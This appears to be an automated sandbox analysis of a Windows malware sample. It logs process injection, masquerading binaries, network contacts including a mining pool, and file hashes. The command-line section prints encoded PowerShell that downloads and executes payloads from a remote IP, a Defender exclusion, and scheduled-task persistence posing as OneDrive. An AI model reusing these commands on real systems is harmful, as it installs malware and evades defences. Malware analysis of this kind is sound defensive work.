Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\lsass.exe N/A
N/A N/A C:\ProgramData\lsass\lsass.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3148 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 4364 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 384 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 1752 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3148 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 384 wrote to memory of 2324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 2324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 2324 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 384 wrote to memory of 4668 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2116 wrote to memory of 952 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 1752 wrote to memory of 3364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1752 wrote to memory of 3364 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\OneDrive.exe
PID 1500 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 3324 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 3956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 3956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 1168 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 4080 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1500 wrote to memory of 4080 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 1752 wrote to memory of 4600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1752 wrote to memory of 4600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1752 wrote to memory of 4600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\dllhost.exe
PID 1752 wrote to memory of 2600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1752 wrote to memory of 2600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 1752 wrote to memory of 2600 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\lsass.exe
PID 4364 wrote to memory of 4248 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4364 wrote to memory of 4248 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4364 wrote to memory of 4956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4364 wrote to memory of 4956 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4364 wrote to memory of 4420 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4364 wrote to memory of 4420 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2600 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 2600 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 2600 wrote to memory of 3232 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\schtasks.exe
PID 4364 wrote to memory of 1984 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 4364 wrote to memory of 1984 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\powercfg.exe
PID 2600 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 2600 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 2600 wrote to memory of 4656 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\ProgramData\lsass\lsass.exe
PID 2600 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 2600 wrote to memory of 3356 N/A C:\Users\Admin\AppData\Roaming\lsass.exe C:\Windows\SysWOW64\cmd.exe
PID 3356 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3356 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 3356 wrote to memory of 3756 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2140 wrote to memory of 4052 N/A C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe C:\Windows\System32\conhost.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc IABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQwA6AFwA

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBmAGkAbABlAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwByAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -enc JABmADUAPQAnAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvACcAOwAgACQAZgAxAD0AJwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQAnADsAIAAkAGYAMwA9ACcAYQBkAFMAdAByAGkAbgBnACgAJwAnAGgAdAB0AHAAOgAvAC8ANgAyAC4AMgAwADQALgA0ADEALgAyADMALwBvAC4AcABuAGcAJwAnACkAJwA7ACQARwBPAE8APQBJAGAARQBgAFgAIAAoACQAZgAxACwAJABmADUALAAkAGYAMwAgAC0ASgBvAGkAbgAgACcAJwApAHwASQBgAEUAYABYAA==

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Roaming\OneDrive.exe

"C:\Users\Admin\AppData\Roaming\OneDrive.exe"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Roaming\dllhost.exe

"C:\Users\Admin\AppData\Roaming\dllhost.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "OneDrive"

C:\Users\Admin\AppData\Roaming\lsass.exe

"C:\Users\Admin\AppData\Roaming\lsass.exe"

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uxwihwxmk#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'OneDrive' /tr '''C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\OneDrive\OneDrive.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'OneDrive' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\SysWOW64\schtasks.exe

"schtasks.exe" /create /tn OneDrive /tr "C:\ProgramData\lsass\lsass.exe" /st 11:11 /du 23:59 /sc daily /ri 1 /f

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\ProgramData\lsass\lsass.exe

"C:\ProgramData\lsass\lsass.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFEE7.tmp.bat""

C:\Windows\SysWOW64\timeout.exe

timeout 7

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

Network

Country Destination Domain Proto
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 23.41.204.62.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 ipinfo.io udp
US 34.117.59.81:80 ipinfo.io tcp
US 93.184.220.29:80 tcp
US 8.8.8.8:53 81.59.117.34.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
N/A 185.161.248.16:26885 tcp
US 8.8.8.8:53 16.248.161.185.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
RU 62.204.41.23:80 62.204.41.23 tcp
US 8.8.8.8:53 maper.info udp
DE 148.251.234.93:443 maper.info tcp
US 8.8.8.8:53 93.234.251.148.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 40.125.122.176:443 tcp
US 20.189.173.12:443 tcp
NL 8.238.20.126:80 tcp
NL 173.223.113.164:443 tcp
NL 173.223.113.131:80 tcp
US 131.253.33.203:80 tcp
US 40.125.122.176:443 tcp
US 209.197.3.8:80 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
US 40.125.122.176:443 tcp
N/A 185.161.248.16:4440 tcp

Files

memory/3148-136-0x0000000000FB0000-0x0000000000FCC000-memory.dmp

memory/2116-138-0x00000133F3280000-0x00000133F3290000-memory.dmp

memory/384-139-0x000002A27FD30000-0x000002A27FD40000-memory.dmp

memory/2116-140-0x00000133F3280000-0x00000133F3290000-memory.dmp

memory/1752-142-0x000001CA3E890000-0x000001CA3E8A0000-memory.dmp

memory/384-141-0x000002A27FD30000-0x000002A27FD40000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04i2jxwo.d5c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/384-152-0x000002A27FC50000-0x000002A27FC72000-memory.dmp

memory/1752-182-0x000001CA3E890000-0x000001CA3E8A0000-memory.dmp

memory/384-183-0x000002A27FD30000-0x000002A27FD40000-memory.dmp

memory/2116-184-0x00000133F3280000-0x00000133F3290000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f545d92eaeb4ebb68a5c8838b55f1924
SHA1 c684ad2f60e49efb66696635f803ae4aea647582
SHA256 1ed48128452265f4884b8b2624677eed5466e03f8011716dda2006eb5c86220d
SHA512 8fa54b3e598eb5c8097ad385f3ef28bb8f4854b5a09d430d56fc968207803ae48d40fa6f47286901024be5bec5f146548fa5e2483d3fd011af167ba4e16064b6

memory/4668-186-0x0000000000400000-0x000000000040C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 d85ba6ff808d9e5444a4b369f5bc2730
SHA1 31aa9d96590fff6981b315e0b391b575e4c0804a
SHA256 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA512 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

memory/4668-190-0x0000000005870000-0x00000000058D6000-memory.dmp

memory/4668-191-0x0000000005980000-0x0000000005A1C000-memory.dmp

memory/4668-192-0x00000000058E0000-0x0000000005946000-memory.dmp

memory/952-194-0x0000000000400000-0x0000000000430000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

memory/952-198-0x000000000B2B0000-0x000000000B8C8000-memory.dmp

memory/952-199-0x000000000ADA0000-0x000000000AEAA000-memory.dmp

memory/952-200-0x000000000ACC0000-0x000000000ACD2000-memory.dmp

memory/2116-201-0x00000133F3280000-0x00000133F3290000-memory.dmp

memory/2116-202-0x00000133F3280000-0x00000133F3290000-memory.dmp

memory/1752-203-0x000001CA3E890000-0x000001CA3E8A0000-memory.dmp

memory/952-204-0x0000000005800000-0x0000000005810000-memory.dmp

memory/952-205-0x000000000AD20000-0x000000000AD5C000-memory.dmp

memory/1752-206-0x000001CA3E890000-0x000001CA3E8A0000-memory.dmp

memory/1752-207-0x000001CA3E890000-0x000001CA3E8A0000-memory.dmp

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Roaming\OneDrive.exe

MD5 743022328f955e2cbb5f2f375bd0ab72
SHA1 226a731c638cf6e79b92cc2bb6369b04e6a98b55
SHA256 dbe99e4119c6f19e273cbedbbe27afb953f92f7284638dda5c0630b7b0befa4f
SHA512 aeebe2dfca665153bebb637875ce6334959c00022ec7fd9209e444e45b28fce5e6b53c13b5f89ffae790fec92f01829229ffbfa690f10ab115a62053edfe1f83

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0c9e4a5091153aad3afaf5372fbb07a0
SHA1 dbe1fc5ac93d241d51311f638d8a386f01bf25aa
SHA256 f88bdcf6352355427dc31af5f99817e7ead0349ba5b17e0dc5331ad424e7b6e4
SHA512 3e0811a82f7eb57c32e3eaeee734951c93ea3616476fa3e52ebb135de41ead7855db5539f991f6826568fc4d658fa7a266fdfe4e3840bdb9813005d6e7ee746e

memory/1296-224-0x0000014728540000-0x0000014728550000-memory.dmp

memory/1296-225-0x0000014728540000-0x0000014728550000-memory.dmp

memory/1296-226-0x0000014728540000-0x0000014728550000-memory.dmp

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

C:\Users\Admin\AppData\Roaming\dllhost.exe

MD5 08e3930a42197a422d064569c4778997
SHA1 74832aa332b48422e5d448f5099b397e84c18712
SHA256 322626ca37f3929c517b4c0ceeb130836be5f36a1eb68ab0adb00c0f4a3f3813
SHA512 b70952bc3cd54abcc2c7c1c71b1f16d96a001900574237263a210512a348542e6ec7a05e7fcc0ff5831a200db23fae06f2bbb0f0bb249599fed0fa1761516368

memory/4600-234-0x0000000000400000-0x000000000083B000-memory.dmp

memory/1296-235-0x0000014728540000-0x0000014728550000-memory.dmp

memory/952-236-0x000000000B030000-0x000000000B0A6000-memory.dmp

